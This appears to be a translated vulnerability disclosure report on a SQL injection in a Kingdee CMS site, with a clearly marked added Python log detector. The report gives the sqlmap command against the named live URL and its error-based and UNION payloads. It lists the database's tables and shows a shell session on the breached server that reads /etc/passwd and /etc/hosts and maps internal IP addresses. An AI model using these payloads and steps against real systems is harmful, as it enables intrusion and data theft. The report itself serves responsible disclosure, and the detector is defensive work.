2015-04-28: Details sent to the vendor; awaiting vendor action
2015-04-28: Vendor confirmed; details disclosed to the vendor only
2015-05-08: Details disclosed to core white hats and experts in the relevant field
2015-05-18: Details disclosed to regular white hats
2015-05-28: Details disclosed to intern white hats
2015-06-12: Details disclosed to the public
...
Kingdee site: cms.kisdee.com   IP: 118.194.40.103
Injection test with sqlmap:
Sqlmap.exe -u "http://cms.kisdee.com/yp/product.php?prowhere=1" -v 3 --dbms=mysql
sqlmap identified the following injection points with a total of 23 HTTP(s) requests:
---
Place: GET
Parameter: prowhere
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: prowhere=1) AND (SELECT 5495 FROM(SELECT COUNT(*),CONCAT(0x3a6d6f723a,(SELECT (CASE WHEN (5495=5495) THEN 1 ELSE 0 END)),0x3a7969753a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (2144=2144
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: prowhere=1) LIMIT 1,1 UNION ALL SELECT NULL, NULL, CONCAT(0x3a6d6f723a,0x79667a6853524b774958,0x3a7969753a)#
    Vector: LIMIT 1,1 UNION ALL SELECT NULL, NULL, [QUERY]#
---

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: prowhere
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: prowhere=1) AND (SELECT 5495 FROM(SELECT COUNT(*),CONCAT(0x3a6d6f723a,(SELECT (CASE WHEN (5495=5495) THEN 1 ELSE 0 END)),0x3a7969753a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (2144=2144
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: prowhere=1) LIMIT 1,1 UNION ALL SELECT NULL, NULL, CONCAT(0x3a6d6f723a,0x79667a6853524b774958,0x3a7969753a)#
    Vector: LIMIT 1,1 UNION ALL SELECT NULL, NULL, [QUERY]#
---
available databases [2]:
[*] information_schema
[*] KDPortal

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: prowhere
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: prowhere=1) AND (SELECT 5495 FROM(SELECT COUNT(*),CONCAT(0x3a6d6f723a,(SELECT (CASE WHEN (5495=5495) THEN 1 ELSE 0 END)),0x3a7969753a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (2144=2144
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: prowhere=1) LIMIT 1,1 UNION ALL SELECT NULL, NULL, CONCAT(0x3a6d6f723a,0x79667a6853524b774958,0x3a7969753a)#
    Vector: LIMIT 1,1 UNION ALL SELECT NULL, NULL, [QUERY]#
---
Database: KDPortal
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| phpcms_member_group_priv | 807962 |
| phpcms_log | 523885 |
| zm_ip | 371671 |
| ys_api_access | 370740 |
| ys_feedback | 336509 |
| phpcms_search | 124022 |
| phpcms_content | 118638 |
| phpcms_content_count | 116683 |
| phpcms_c_news | 110427 |
| phpcms_ads_stat | 106401 |
| phpcms_admin_role_priv | 101413 |
| phpcms_hits | 84484 |
| ys_use_log | 66395 |
| phpcms_content_tag | 53760 |
| phpcms_attachment | 39544 |
| phpcms_special_content | 27912 |
| ys_opportunity | 26706 |
| zhj_315_invite | 23781 |
| kdcms_faqsearch | 12453 |
| moweekly_wp_comments | 12393 |
| phpcms_keyword | 11451 |
| ys_ips | 10332 |
| kdcms_hits | 8598 |
| kdcms_manual | 7990 |
| kdcms_manual_data | 7990 |
| phpcms_menu | 7436 |
| phpcms_c_policy | 7417 |
| phpcms_category | 7351 |
| kdcms_category | 7020 |
| zm_user_credit | 6249 |
| zhj_315_poll_log | 5893 |
| kdcms_log | 5851 |
| kdcms_faq | 5646 |
| kdcms_faq_data | 5646 |
| zz_thewise_reg | 5556 |
| zhj_315_user | 3531 |
| kdcms_linkage | 3285 |
| kdcms_search | 3130 |
| phpcms_app_share | 2680 |
| phpcms_content_position | 2408 |
| kdcms_attachment | 2364 |
| phpcms_comment | 2283 |
| lsw_user_state | 2102 |
| kdcms_attachment_index | 1982 |
| phpcms_copyfrom | 1365 |
| zhj_315_award | 1350 |
| EM_USER | 1239 |
| lsw_user | 1123 |
| phpcms_author | 1103 |
| kdcms_cache | 1097 |
| phpcms_pay_exchange | 937 |
| phpcms_special | 935 |
| ms_info | 918 |
| kdcms_admin_role_priv | 773 |
| lsw_func | 660 |
| ys_site | 657 |
| kdcms_position_data | 620 |
| ys_recycler | 617 |
| EE_DIGG_LOG | 615 |
| ee_order_list | 605 |
| member | 585 |
| EE_AWARD_LOG | 571 |
| phpcms_model_field | 564 |
| kdcms_model_field | 455 |
| kdcms_category_priv | 449 |
| phpcms_block | 427 |
| fouryear_user | 399 |
| ee_news_detail | 398 |
| phpcms_c_app | 384 |
| kdcms_menu | 334 |
| moweekly_wp_term_relationships | 333 |
| kdcms_comment_data_1 | 309 |
| moweekly_wp_posts | 309 |
| kdcms_operationcase | 300 |
| kdcms_operationcase_data | 300 |
| kdcms_ebook | 299 |
| kdcms_ebook_data | 299 |
| kdcms_news | 284 |
| kdcms_news_data | 284 |
| phpcms_admin_role | 271 |
| kdcms_video | 245 |
| kdcms_video_data | 245 |
| phpcms_c_ent_case | 227 |
| agiletour_bingo | 207 |
| auction_log | 204 |
| ys_coolsite | 204 |
| kdcms_comment | 195 |
| moweekly_wp_postmeta | 187 |
| zz_search_log | 183 |
| phpcms_app_suggest | 176 |
| moweekly_wp_options | 150 |
| phpcms_yp_stats | 146 |
| phpcms_member | 139 |
| phpcms_member_cache | 139 |
| phpcms_member_info | 139 |
| kdcms_case | 134 |
| kdcms_case_data | 134 |
| tmp_case829 | 127 |
| fouryear_kill | 120 |
| ys_bianma | 110 |
| kis_collection | 108 |
| cards | 106 |
| phpcms_ads | 105 |
| EE_MESSAGE | 99 |
| phpcms_link | 99 |
| phpcms_ads_place | 92 |
| em_special | 87 |
| answer | 77 |
| ys_livesite | 76 |
| kdcms_content_check | 73 |
| kdcms_down | 61 |
| kdcms_down_data | 61 |
| phpcms_c_ent_patch | 60 |
| phpcms_app_category | 51 |
| phpcms_type | 50 |
| ee_product_comment | 49 |
| moweekly_wp_usermeta | 48 |
| ys_class | 48 |
| ys_config | 48 |
| auction_product | 47 |
| phpcms_pay_stat | 47 |
| phpcms_position | 47 |
| kdcms_clientid | 43 |
| kdcms_clientid_data | 43 |
| phpcms_c_product | 42 |
| kdcms_ep_define | 38 |
| kdcms_ep_define_data | 38 |
| phpcms_cache_count | 37 |
| auction_orderlist | 34 |
| phpcms_urlrule | 34 |
| moweekly_wp_term_taxonomy | 28 |
| ys_search | 28 |
| moweekly_wp_terms | 27 |
| kdcms_module | 25 |
| phpcms_ask_actor | 25 |
| phpcms_member_detail | 24 |
| phpcms_model | 24 |
| phpcms_module | 24 |
| question | 23 |
| phpcms_process_status | 21 |
| kdcms_model | 20 |
| phpcms_c_kis_product | 20 |
| kdcms_type | 17 |
| phpcms_c_ent_product | 15 |
| phpcms_role | 14 |
| ys_mingzhan | 14 |
| kdcms_video_charge | 12 |
| kdcms_video_charge_data | 12 |
| ys_coolclass | 12 |
| ys_index_common_use | 12 |
| ys_index_hot_dowm | 12 |
| ys_index_tool | 12 |
| phpcms_c_ent_solution | 11 |
| phpcms_space | 11 |
| phpcms_vote_option | 11 |
| ee_product | 10 |
| kdcms_position | 10 |
| kdcms_poster | 10 |
| kdcms_poster_space | 10 |
| kdcms_urlrule | 9 |
| kdcms_yf_product | 9 |
| kdcms_yf_product_data | 9 |
| phpcms_status | 9 |
| moweekly_wp_links | 8 |
| ys_searchclass | 8 |
| kdcms_admin_role | 7 |
| kdcms_member_group | 7 |
| phpcms_c_alliance_case | 7 |
| phpcms_c_event | 7 |
| phpcms_c_zhj_customer | 7 |
| phpcms_editor_data | 7 |
| phpcms_member_group | 7 |
| kdcms_download | 6 |
| kdcms_download_data | 6 |
| kdcms_workflow | 6 |
| phpcms_process | 6 |
| phpcms_search_type | 6 |
| em_class_info | 5 |
| kdcms_admin_panel | 5 |
| kdcms_site | 5 |
| kdcms_sso_settings | 5 |
| moweekly_wp_users | 5 |
| phpcms_app_industry | 5 |
| phpcms_player | 5 |
| em_product_class | 4 |
| fouryear_product | 4 |
| kdcms_template_bak | 4 |
| phpcms_spider_job | 4 |
| ys_liveclass | 4 |
| kdcms_admin | 3 |
| kdcms_member_menu | 3 |
| phpcms_workflow | 3 |
| ys_admin_user | 3 |
| kdcms_announce | 2 |
| kdcms_link | 2 |
| phpcms_admin | 2 |
| phpcms_area | 2 |
| phpcms_datasource | 2 |
| phpcms_pay_pointcard_type | 2 |
| phpcms_space_api | 2 |
| phpcms_spider_sites | 2 |
| phpcms_times | 2 |
| kdcms_application | 1 |
| kdcms_application_data | 1 |
| kdcms_comment_setting | 1 |
| kdcms_comment_table | 1 |
| kdcms_picture | 1 |
| kdcms_picture_data | 1 |
| kdcms_session | 1 |
| kdcms_sso_admin | 1 |
| kdcms_sso_applications | 1 |
| kdcms_videodemo | 1 |
| kdcms_videodemo_data | 1 |
| kdcms_wap | 1 |
| phpcms_keylink | 1 |
| phpcms_mood | 1 |
| phpcms_mood_data | 1 |
| phpcms_session | 1 |
| phpcms_vote_subject | 1 |
| zm_admin_info | 1 |
| zz_thewise | 1 |
+--------------------------------+---------+
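The sqlmap output above shows the two request shapes this injection point answered to: the MySQL error-based trick (CONCAT(...,FLOOR(RAND(0)*2))x ... GROUP BY x, which forces a duplicate-key error that carries the query result) and a UNION ALL SELECT column probe terminated with a # comment. Both leave very recognisable strings in the web server's access log. The following is an added example, not code from the report or from Kingdee: a small Python detector that parses combined-format access-log lines, URL-decodes each query parameter, and flags the signatures of those two techniques per source IP. The log format, the signature names, and the sample log lines are assumptions constructed for this example; only the path /yp/product.php and the parameter name prowhere come from the report.

```python
"""
Added example (not part of the original WooYun report or of Kingdee's code):
a log-side detector for the two sqlmap injection signatures printed above.
All log lines below are constructed for this example.
"""
import re
from collections import Counter
from urllib.parse import parse_qsl, quote, unquote_plus, urlsplit

# Patterns derived from the Payload/Vector shapes sqlmap printed above.
SIGNATURES = {
    # CONCAT(...,FLOOR(RAND(0)*2))x ... GROUP BY x: duplicate-key error-based extraction
    "mysql_error_based_rand_groupby": re.compile(
        r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.IGNORECASE),
    # a catalogue table such as INFORMATION_SCHEMA.CHARACTER_SETS used as a row source
    "information_schema_probe": re.compile(r"INFORMATION_SCHEMA\s*\.", re.IGNORECASE),
    # UNION-based extraction
    "union_select": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.IGNORECASE),
    # LIMIT n,m ... # : the comment terminator seen in the UNION vector
    "limit_comment_terminator": re.compile(r"\bLIMIT\s+\d+\s*,\s*\d+.*#\s*$", re.IGNORECASE),
}

# Apache/nginx "combined"-style log line (assumed format; adjust for a real server).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+')


def decode_params(path):
    """Return [(name, value)] for the query string. parse_qsl decodes once;
    the extra unquote_plus also exposes double-URL-encoded values."""
    query = urlsplit(path).query
    return [(k, unquote_plus(v)) for k, v in parse_qsl(query, keep_blank_values=True)]


def scan_line(line):
    """Parse one access-log line and return a dict with the signatures matched
    per parameter, or None if the line does not parse at all."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    hits = []
    for name, value in decode_params(m.group("path")):
        for sig, rx in SIGNATURES.items():
            if rx.search(value):
                hits.append((name, sig))
    return {"ip": m.group("ip"), "status": m.group("status"),
            "path": m.group("path"), "hits": hits}


def scan(lines):
    """All parsed lines that matched at least one signature."""
    results = (scan_line(line) for line in lines)
    return [r for r in results if r is not None and r["hits"]]


def offenders(lines):
    """Number of flagged requests per source IP (input for alerting or blocking)."""
    return dict(Counter(r["ip"] for r in scan(lines)))


def _access_line(ip, prowhere_value, status):
    """Build a constructed log line for /yp/product.php with the given prowhere value."""
    return (f'{ip} - - [28/Apr/2015:10:00:00 +0800] '
            f'"GET /yp/product.php?prowhere={quote(prowhere_value, safe="")} HTTP/1.1" '
            f'{status} 512')


# Constructed sample log: one benign request and two shortened payloads shaped like
# the ones sqlmap reported above (hex constants trimmed; RFC 5737 test addresses).
SAMPLE_LOG = [
    _access_line("203.0.113.5", "1", 200),
    _access_line("203.0.113.77",
                 "1) AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x3a,(SELECT 1),0x3a,"
                 "FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (1=1",
                 500),
    _access_line("203.0.113.77",
                 "1) LIMIT 1,1 UNION ALL SELECT NULL, NULL, CONCAT(0x3a,0x41,0x3a)#", 200),
]

if __name__ == "__main__":
    for r in scan(SAMPLE_LOG):
        print(r["ip"], r["status"], [sig for _, sig in r["hits"]])
    print(offenders(SAMPLE_LOG))
```

Run against SAMPLE_LOG, the benign request is not reported; the two payload requests are, with the error-based line matching the FLOOR(RAND(0)*2) and INFORMATION_SCHEMA signatures and the UNION line matching the UNION SELECT and LIMIT/# signatures, so offenders() attributes two flagged requests to 203.0.113.77. The signatures are deliberately narrow (they match sqlmap's default vectors rather than SQL keywords in general) to keep false positives low on a CMS whose normal parameters are plain integers; they are a detection aid, not a substitute for the fix the report asks for.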
[Linux debian-604-clean 2.6.32-5-amd64 #1 SMP Sat Mar 31 04:00:05 UTC 2012 x86_64(daemon)]
/usr/local/ysstore/deploy/apache_portal/cms>cd /
/>ls -al
total 400
drwxr-xr-x 22 root root 4096 May 17 2012 .
drwxr-xr-x 22 root root 4096 May 17 2012 ..
drwxr-xr-x 2 root root 4096 Oct 8 2014 bin
drwxr-xr-x 3 root root 4096 Apr 27 2012 boot
drwxr-xr-x 13 root root 2980 Feb 4 16:25 dev
drwxr-xr-x 68 root root 4096 Feb 4 16:25 etc
drwxr-xr-x 2 root root 4096 May 31 2012 home
lrwxrwxrwx 1 root root 30 Apr 27 2012 initrd.img -> boot/initrd.img-2.6.32-5-amd64
drwxr-xr-x 11 root root 12288 Apr 28 2012 lib
drwxr-xr-x 2 root root 12288 Apr 27 2012 lib32
lrwxrwxrwx 1 root root 4 Apr 27 2012 lib64 -> /lib
drwx------ 2 root root 16384 Apr 27 2012 lost+found
drwxr-xr-x 4 root root 4096 Apr 27 2012 media
drwxr-xr-x 2 root root 4096 Jan 13 2012 mnt
drwxr-xr-x 2 root root 4096 Apr 27 2012 opt
dr-xr-xr-x 151 root root 0 Feb 4 16:25 proc
drwx------ 7 root root 4096 Dec 31 10:44 root
drwxr-xr-x 2 root root 4096 Apr 27 2012 sbin
drwxr-xr-x 2 root root 4096 Jul 21 2010 selinux
drwxr-xr-x 2 root root 4096 Apr 27 2012 srv
drwxr-xr-x 13 root root 0 Feb 4 16:25 sys
drwxrwxrwt 2 root root 303104 Apr 27 15:51 tmp
drwxr-xr-x 13 root root 4096 May 17 2012 usr
drwxr-xr-x 13 root root 4096 Apr 27 2012 var
lrwxrwxrwx 1 root root 27 Apr 27 2012 vmlinuz -> boot/vmlinuz-2.6.32-5-amd64
/>ifconfig
eth0      Link encap:Ethernet  HWaddr 00:50:56:bf:00:35
          inet addr:192.168.223.136  Bcast:192.168.223.255  Mask:255.255.255.0
          inet6 addr: fe80::250:56ff:febf:35/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:230310969 errors:0 dropped:0 overruns:0 frame:0
          TX packets:309544330 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:62579541022 (58.2 GiB)  TX bytes:308678048964 (287.4 GiB)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:7651048 errors:0 dropped:0 overruns:0 frame:0
          TX packets:7651048 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:751215062 (716.4 MiB)  TX bytes:751215062 (716.4 MiB)

lo:157    Link encap:Local Loopback
          inet addr:192.168.223.157  Mask:255.255.255.255
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
/>arp -a
? (192.168.223.133) at 00:50:56:bf:00:3b [ether] on eth0
? (192.168.223.129) at 00:50:56:bf:00:00 [ether] on eth0
? (192.168.223.1) at 5c:dd:70:2b:c0:77 [ether] on eth0
? (192.168.223.130) at 00:50:56:bf:00:2b [ether] on eth0
/>cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:103::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
nagios:x:1001:1001::/home/nagios:/bin/bash
/>cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 debian-604-clean.kingdee.gbl debian-604-clean
192.168.223.147 api.cmcloud.cn
# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
/>cat /etc/issue
Debian GNU/Linux 6.0 \n \l
···
Upgrade or disable.
Severity: High
Vulnerability Rank: 15
Confirmed: 2015-04-28 11:51
Thank you for your attention to Kingdee and for the in-depth research that found a security vulnerability in Kingdee's systems. We have notified the relevant department to fix it.
None yet